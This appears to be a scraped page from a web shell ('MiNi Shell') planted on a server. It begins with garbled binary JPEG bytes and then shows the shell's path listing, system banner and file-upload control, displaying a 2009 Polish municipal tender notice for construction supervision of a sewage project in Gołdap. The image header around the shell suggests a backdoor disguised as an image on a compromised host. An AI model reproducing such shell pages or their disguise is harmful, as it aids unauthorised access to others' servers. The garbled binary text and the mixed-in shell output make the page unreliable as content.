JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090514/149194-N-2009.html

<p class="kh_header"><b>Gołdap: Wykonanie czynności inspektora nadzoru inwestorskiego dla inwestycji Kanalizacja i oczyszczanie ścieków Rożyńsk - Boćwinka oczyszczalnia ścieków w m. Boćwinka</b><br>
<b>Numer ogłoszenia: 149194 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gołdap , Plac Zwycięstwa 14, 19-500 Gołdap, woj. warmińsko-mazurskie, tel. 087 6156000, faks 087 6150800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.goldap.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie czynności inspektora nadzoru inwestorskiego dla inwestycji Kanalizacja i oczyszczanie ścieków Rożyńsk - Boćwinka oczyszczalnia ścieków w m. Boćwinka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia: 

Wykonawca pełnić będzie obowiązki i funkcję Inspektora Nadzoru Inwestorskiego zgodnie z definicją określoną Prawem Budowlanym (Rozdział 3 art. 25, 26 i 27) oraz reprezentować będzie Inwestora w trakcie realizacji projektu którego postępowanie dotyczy.
      
      W ramach pełnienia funkcji Inspektora Nadzoru w skład podstawowych obowiązków wchodzą: 

a)   na etapie prowadzenia robót budowlano - montażowych:
1.prowadzenie ogólnego nadzoru nad realizacją robót i ich finansowaniem zgodnie
z harmonogramem robót;
2.stałe uczestniczenie w naradach technicznych problemowych i innych organizowanych przez wszystkie strony procesu inwestycyjnego;
3.wydawanie zgody na wykonanie robót dodatkowych po uprzedniej konsultacji
z zamawiającym;
4.podejmowanie wszelkich racjonalnych działań umożliwiających prawidłową realizację harmonogramu;
5.prowadzenie nadzoru technicznego nad realizacją robót, zgodnie z prawem budowlanym;
6.stałe konsultowanie i fachowe doradzanie na rzecz Inwestora Bezpośredniego;
7.prowadzenie rozliczeń związanych z realizacją, opracowywanie dokumentów rozliczeniowych, sprawozdań i innych dokumentów wymaganych przy realizacji inwestycji dotowanych z budżetu państwa i funduszy strukturalnych ;
8.współpraca z Inwestorem Bezpośrednim, jednostką projektową i wykonawczą w okresie realizacji inwestycji;
9.podejmowanie czynności mających na celu ochronę interesów Inwestora;
10.pełnienie funkcji koordynacyjnych na budowie;
11.sprawowanie nadzoru nad kompleksową realizacją inwestycji zgodnie z Prawem Budowlanym (Rozdział 3 art. 25, 26, 27) oraz zasadami działania inspektora nadzoru, a w szczególności:
kontrola jakości wykonanych prac budowlano - montażowych zgodności robót z projektem i pozwoleniem na budowę, obowiązującymi przepisami i normami, przepisami techniczno - budowlanymi  oraz  zasadami bezpieczeństwa w toku budowy;
sprawdzanie posiadania przez wykonawcę odpowiednich dokumentów (atestów, świadectw jakości wyników badań) dotyczących materiałów i urządzeń;
kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego wykonania
i wyceny robót;
kontrola jakości wykonanych prac; 
sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w prowadzonych próbach i odbiorach technicznych instalacji, urządzeń technicznych oraz przygotowywanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania;
rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzenia robót, a w razie potrzeby zaciąganie opinii autora projektu bądź rzeczoznawców;
ustanowienie inspektorów nadzoru inwestorskiego wszystkich niezbędnych branż, posiadających uprawnienia i doświadczenie w nadzorowaniu inwestycji;
bieżące prowadzenie rozliczeń finansowych z projektantami, wykonawcą, dostawcami usług i towarów oraz sprawdzanie kalkulacji wycen i faktur;
bieżące informowanie Inwestora o postępie robót na budowie i ewentualnych trudnościach w jej realizacji;
zorganizowanie i dokonanie przy współudziale Inwestora odbiorów częściowych
i końcowego oraz protokolarne przekazanie Inwestorowi zrealizowanego zakresu inwestycji;
sporządzenie wniosków o zapłatę kar umownych przez wykonawcę za nieterminowe wykonanie przedmiotu umowy;
opracowanie końcowego rozliczenia prac budowlano - instalacyjnych oraz inwestycji
wystawienia dowodów PT w terminie 30 dni od daty końcowego odbioru oraz przedłożenie Inwestorowi oświadczenia o usunięciu przez wykonawcę ewentualnych usterek stwierdzonych przy odbiorze;

b)  po zakończeniu robót budowlano - montażowych: 
1.wykonanie czynności wynikających z praw i obowiązków gwarancji i rękojmi łącznie
z uczestnictwem w komisjach powołanych przez Inwestora do oceny jakości robót w okresie rękojmi i gwarancji;
2.zawiadamianie wykonawców o stwierdzonych wadach w ich robotach w okresie gwarancji i rękojmi;
3.sporządzenie wniosków o zapłatę kar umownych za zwłokę w usunięciu usterek stwierdzonych w okresie gwarancji i rękojmi;
4.sporządzenie protokółu pogwarancyjnego;
5.uzyskanie w Starostwie Powiatowym pozwolenia na użytkowanie obiektu;


W ramach robót budowlanych zostaną wykonane sieci kanalizacji sanitarnych na terenie miasta i gminy Gołdap 

1.Boćwinka -Rożyńsk Mały (opis techniczny - załącznik nr 1 do SIWZ)


Wykonawcy przed złożeniem oferty powinni zapoznać się z dokumentacją dostępną w Urzędzie Miejskim w Gołdapi, Pl. Zwycięstwa 14.
Dokumentacja techniczna - projektowa, która jest w posiadaniu Zamawiającego i będzie udostępniona (wypożyczana) Wykonawcom bezpłatnie do sporządzenia oferty, po wcześniejszym uzgodnieniu terminu jej wypożyczenia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 76.60.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do przetargu wykonawca zobowiązany jest do wniesienia wadium w wysokości 
500 zł (słownie: pięćset złotych.) Wadium powinno być wniesione najpóźniej do dnia 25 maja 2009 r.  do godz. 10.00      
Wadium może być wnoszone w: 
-    pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. Nr 109, poz. 1158 z późn. zm.)
Wadium wnoszone w formie pieniężnej należy wnieść w formie przelewu na konto Zamawiającego:
	PKO BP S.A. O/ EŁK       89 1020 4724 0000 3602 0007 6463
Wadium wnoszone w formie poręczeń bankowych, gwarancji bankowych i ubezpieczeniowych tj.: określonych w art. 45 ust. 6. pkt. 2), 3), 4) i 5) ustawy należy złożyć w kasie Urzędu Miejskiego w Gołdapi, I piętro pokój nr 16 do wyznaczonego terminu składania ofert
tj.: do dnia  25 maja 2009 r. godz. 10.00   
Oferta, która nie będzie zabezpieczona akceptowalną formą wadium zostanie przez Zamawiającego wykluczona z dalszego postępowania.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy:        
      - który wycofał ofertę przed upływem terminu składania ofert,
      - który został wykluczony z postępowania,
      - którego oferta została odrzucona, 
Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się nie możliwe z przyczyn leżących po stronie wykonawcy.
Zamawiający niezwłocznie zwróci wadium, jeżeli:
- upłyną termin związania ofertą;
      - zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego  
        wykonania umowy;
   -  unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte  
      lub upłyną termin do ich wnoszenia.
Złożenie przez Wykonawcę, którego oferta została odrzucona lub wykluczonego z postępowania wniosku o zwrot wadium jest równoznaczna ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą brać udział wykonawcy którzy spełniają następujące warunki:
2.1.1.  Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy
2.1.2.  Spełniają warunki określone w art. 22 ust. 1 Ustawy.  
2.1.3. Złożą ważną ofertę, zgodnie z wymaganiami zawartymi w specyfikacji.
2.1.4. Są uprawnieni do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi  
    niezbędnych do realizacji zamówienia,
2.1.5. Zrealizują zamówienie w ustalonym terminie (Rozdział  III pkt. 4 SIWZ),  
2.1.6. Przedstawią załączniki, oświadczenia i dokumenty zgodnie z Rozdziałem III pkt. 3.1. 
    niniejszej specyfikacji istotnych warunków zamówienia.
2.1.7. Udzielą 30 dniowego terminu płatności,
2.1.8. Udokumentują, że w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania
o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali 5 usług nadzoru inwestorskiego odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia o wartości nie niższej niż 25 000 zł każda
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, przedstawionych na załączniku nr 5 (Wykonawca powinien wykazać się prowadzeniem 5 nadzorów inwestorskich w latach 2006 - 2008 nad inwestycjami budowlanymi) oraz załączą dokumenty potwierdzające, że usługi te zostały wykonane należycie; 
2.Posiadają niezbędne uprawnienia i zezwolenia do nadzorowania i kierowania robotami budowlanymi ww. zakresie objętym niniejszym zamówieniem, tj.: w branży budowlanej, drogowej, sanitarnej, i elektrycznej,.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3.1.1. Wypełniony formularz ofertowy (załącznik nr 1) 
3.1.2. Oświadczenie wykonawcy z art. 22 ust. 1 Ustawy (załącznik nr 2). 
3.1.3.  	
[dotyczy Wykonawcy krajowego] Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawionego nie wcześniej niż 6 miesięcy prze upływem składania ofert)
[dotyczy Wykonawcy zagranicznego] dokument lub dokumenty wystawione w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto  likwidacji ani nie ogłoszono upadłości.  
3.1.4. Uprawnienia budowlane do nadzorowania i kierowania robotami budowlanymi
w następujących branżach: budowlanej, sanitarnej, drogowej i elektrycznej
3.1.5. 
[dotyczy Wykonawcy krajowego] zaświadczenia o przynależności do Polskiej Izby Inżynierów Budownictwa aktualne na dzień składania ofert, (jako potwierdzenie wymogu określonego
w powyższym ppkt. tj.: 3.1.4.)
[dotyczy Wykonawcy zagranicznego] dokument lub dokumenty wystawione w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że posiada kwalifikacje zawodowe inżynierów budownictwa 
3.1.6. wykaz wykonanych w okresie ostatnich 3 lat, przed dniem wszczęcia postępowania
o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 5 usług nadzoru inwestorskiego odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówienia o wartości nie niższej niż 25 000 zł każdy
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, przedstawionych na załączniku nr 5 (Wykonawca powinien wykazać się prowadzeniem 5 nadzorów inwestorskich w latach 2006 - 2008 nad inwestycjami budowlanymi) 
3.1.7. dokumenty potwierdzające, że usługi wymienione na podstawie ppkt. 3.1.6, zostały  
       wykonane należycie,  
3.1.8.  wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, przedstawiony na załączniku nr 4 (dotyczy osób określonych w ppkt. 3.1., ppkt.  1.5, 1.6)   

3.1.9.
[dotyczy Wykonawcy krajowego] aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem składania ofert,
[dotyczy Wykonawcy zagranicznego] dokument lub dokumenty wystawione w kraju w którym  Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.   
3.1.10. Oświadczenie o zobowiązaniu do realizacji zamówienia w terminie określonym 
w Rozdziale III pkt. 4 niniejszej SIWZ,
3.1.11. Oświadczenie złożone na formularzu ofertowym (załącznik nr 1) o akceptacji terminu  związania ofertą. 
3.1.12. Oświadczenie złożone na formularzu ofertowym (załącznik nr 1) o udzieleniu 
30 dniowego terminu płatności. 
3.1.13. Oświadczenie złożone na formularzu ofertowym (załącznik nr 1) o zobowiązaniu się Wykonawcy do zawarcia umowy na warunkach określonych we wzorze umowy 
(załącznik nr 4),
3.1.14.Oświadczenie złożone na formularzu ofertowym (załącznik nr 1), że prace objęte niniejszym zamówieniem wykonamy we własnym zakresie lub w przypadku uczestnictwa podwykonawców w procesie inwestycyjnym przedstawienie informacji o ich udziale na załączniku nr 6

Dotyczy dokumentów składach przez Wykonawców zagranicznych w ppkt. 3.1.3, 3.1.5., 3.1.9. -  jeżeli w kraju pochodzenia osoby lub w kraju którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentu, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.     

Zamawiający może wezwać w wyznaczonym przez siebie terminie do uzupełnienia  dokumentów potwierdzających spełnienie warunków udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.goldap.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gołdap Pl. Zwycięstwa 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 10:00, miejsce: sekretariat I piętro Urząd Miejski w Gołdapi.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com